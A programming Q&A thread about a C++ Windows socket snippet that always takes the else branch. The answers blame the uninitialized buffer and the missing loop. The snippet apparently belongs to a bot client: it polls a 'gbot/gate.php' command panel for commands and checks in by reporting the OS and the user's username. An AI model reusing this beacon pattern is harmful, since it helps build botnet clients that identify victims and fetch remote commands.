# C++ send and recv sockets

Tags: c++, windows, sockets, send

with the following code, the program always goes into the else part of the if, and never to the first- why?

```
char buffer[10000];
    if(buffer[0] != '\0')
    {
        send(Socket, "GET /gbot/gate.php?page=get_cmd", strlen("GET /gbot/gate.php?page=get_cmd"), 0);
        recv(Socket, buffer, 10000, 0);
        cout << buffer;
        buffer[0] = '\0';
    }
    else
    {
        string mybuf("GET /gbot/gate.php?page=ident&os=");
        if(getenv("windir") != NULL){
            mybuf += "windows&username=";
            mybuf += getenv("username");
            mybuf += "&version=win";
            mybuf += "\r\n\r\n";
        }
        else
            mybuf += "linux\r\n\r\n";
        send(Socket, mybuf.c_str(), mybuf.length(), 0);
        recv(Socket, buffer, 10000, 0);
        cout << buffer;
    }
```

Comment: because buffer[0] has '\0', I guess. What do you say?

Comment: but in the else part when i recv through the socket to the buffer, it changes, ain't it?

Comment: Of course it changes but there is no loop here to ever get back to the `if`.

Answer (score 0):

You never initialized `char buffer[10000];`, hence the contents of buffer is non-deterministic.

Answer (score 0):

Initialize the array before IF statement like;

```
char buffer[10000];
for (int i = 0; i < 10000; i++)
    buffer[i] = '1'; //you can initialize with any character except '\0' because you're testing for != in IF.
```